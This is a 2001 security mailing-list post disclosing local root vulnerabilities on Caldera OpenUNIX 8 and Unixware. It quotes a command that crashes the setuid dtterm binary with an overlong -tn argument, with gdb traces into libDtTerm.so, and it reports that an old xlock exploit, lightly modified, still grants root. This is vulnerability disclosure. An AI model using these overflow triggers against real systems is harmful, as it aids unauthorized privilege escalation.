Re: OpenUNIX 8 & Unixware possible local root

From: Aycan Irican (aycanat_private)
Date: Wed Oct 03 2001 - 10:57:34 PDT

    Yes, I read yours... It looks like a multiple-vendor shared 
    library (libDtTerm.so) problem to me.
    
    Also, Caldera must supply a patch for the OpenUNIX 8 xlock vulnerability. I 
    sent a mail to "security-alert" a few days ago about the xlock vulnerability, 
    but they told me that they put out an unofficial patch for Unixware 7; 
    OpenUNIX 8 is still VULNERABLE (the patch is not applicable on OpenUNIX 8). I 
    think this is a serious bug.
    For example, I remember that in early 1999 K2 released an exploit for the 
    Unixware 7 xlock vulnerability, and any standard user who can make a 
    little modification gets root access on OpenUNIX 8 TODAY (I got root). 
    Hey man, the exploit is around 2 years old and it worked.
    
    KF wrote:
    
    >This goes along with a mailing from earlier this morning ... I stated
    >that I was able to make ALL suid / sgid dt* files core dump except the
    >dtmail binary...
    >-KF
    >
    >Aycan Irican wrote:
    >
    >>Another dt series bug...
    >>
    >>$ uname -a
    >>OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
    >>$ id
    >>uid=101(fixxxer) gid=1(other)
    >>$ ls -al /usr/dt/bin/dtterm
    >>-r-sr-xr-x 1 root bin 60892 Haz 10 05:03 /usr/dt/bin/dtterm
    >>$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
    >>Warning: Missing charsets in String to FontSet conversion
    >>Warning: Missing charsets in String to FontSet conversion
    >>Memory fault
    >>
    >> # /usr/gnu/bin/gdb /usr/dt/bin/dtterm
    >>(no debugging symbols found)...
    >>(gdb) set args -tn `perl -e 'print "A"x1040'`
    >>(gdb) run
    >>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
    >>(no debugging symbols found)...(no debugging symbols found)...
    >>...
    >>..
    >>[New LWP 2]
    >>
    >> Program received signal SIGSEGV, Segmentation fault.
    >>0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1
    >>[New Thread 1]
    >>(gdb) set args -tn `perl -e 'print "A"x1042'`
    >>(gdb) run
    >>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'`
    >>(no debugging symbols found)...(no debugging symbols found)...
    >>[New LWP 2]
    >>
    >> Program received signal SIGSEGV, Segmentation fault.
    >>0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1
    >>[New Thread 1]
    >>(gdb) q
    >>
    >>self-explained...
    >>enjoy...
    >>
    >>--
    >>Aycan Irican
    >>Systems Engineer
    >>Prosoft Communication Systems Ltd.
    >>Resit Galip Cad. 85/2 Gaziosmanpaşa 06700 Ankara
    >>Tel:+90-312-446-6616 Fax:+90-312-446-2423
    


